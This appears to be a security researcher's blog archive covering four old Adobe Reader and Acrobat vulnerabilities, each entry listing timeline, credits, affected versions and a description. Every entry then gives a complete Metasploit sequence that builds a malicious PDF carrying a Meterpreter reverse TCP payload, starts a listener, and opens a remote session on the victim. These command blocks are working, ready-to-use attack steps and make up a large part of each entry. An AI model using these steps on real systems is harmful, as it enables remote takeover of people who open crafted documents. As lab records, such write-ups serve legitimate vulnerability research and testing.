Tag Archives: Adobe

CVE-2007-5659 : Adobe Acrobat Collab.collectEmailInfo Buffer Overflow

Exploits, Metasploit, ,

Timeline :

Vulnerability reported by Greg MacManus to IDefense Labs
Vulnerability reported from IDefense Labs to the vendor the 2007-10-10
Adobe release version 8.1.2 the 2008-02-06
Exploit discovered in the wild the 2008-02-08
Public disclosure the 2008-02-08
Metasploit PoC provided by MC the 2009-03-28

    PoC provided by :

MC
Didier Stevens

    Reference(s) :

CVE-2007-5659
EDB-ID-11987

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional 8.1.1

    Tested on Windows XP SP3 with :

    Adobe Reader 8.1.1

    Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_collect­emailinfo
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2009-0658 : Adobe Acrobat JBIG2Decode Memory Corruption Exploit

Exploits, Metasploit, ,

Timeline :

Exploit discovered in the wild the 2009-02-19
Milw0rm PoC provided by Guido Landi the 2009-02-23
Metasploit PoC provided by Nathan Keltner the 2009-03-26

    PoC provided by :

natron
xort
redsand
MC
Didier Stevens

    Reference(s) :

CVE-2009-0658
EDB-ID-11987

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional 9.0.0
Adobe Reader and Adobe Acrobat Professional prior to version 8.1.4
Adobe Reader and Adobe Acrobat Professional prior to version 7.1.1

    Tested on Windows XP SP3 with :

    Adobe Reader 9.0.0

    Description :

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.

    Commands :

use exploit/windows/fileformat/adobe_jbig2de­code
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2009-0927 : Adobe Acrobat Collab.getIcon Buffer Overflow

Exploits, Metasploit, ,

Timeline :

Vulnerability reported to ZDI by Tenable Network Security
Vulnerability reported by ZDI to the vendor the 2008-07-03
Coordinated advisory release the 2009-03-24
Metasploit PoC provided by HD Moore the 2009-03-28
Milw0rm PoC provided by Abysssec the 2009-05-04

    PoC provided by :

MC
Didier Stevens
jduck

    Reference(s) :

CVE-2009-0927

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional 9.0.0
Adobe Reader and Adobe Acrobat Professional prior to version 8.1.4
Adobe Reader and Adobe Acrobat Professional prior to version 7.1.1

    Tested on Windows XP SP3 with :

    Adobe Reader 9.0.0

    Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include prior to 7.1.1, prior to 8.1.3, and prior to 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_geticon
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2009-3953 : Adobe Acrobat U3D CLODProgressiveMeshDeclaration Array Overrun

Exploits, Metasploit, ,

Timeline :

Vulnerability provided to Secunia by Felipe Andres Manzano for versions prior to 9.2
Vulnerability provided to Secunia by Parvez Anwar for version 9.2
Vulnerabilities provided by Secunia to the vendor
Metasploit PoC provided by duck the 2009-11-25
Coordinated advisory release the 2010-01-12 !

    PoC provided by :

Felipe Andres Manzano
jduck

    Reference(s) :

CVE-2009-3953

    Affected version(s) :

Adobe Reader and Acrobat Professional prior to version 9.3
Acrobat prior to version 8.2

    Tested on Windows XP SP3 with :

    Adobe Reader 9.0.0

    Description :

This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include prior to 7.1.4, prior to 8.2, and prior to 9.3. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_u3d_mes­hdecl
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig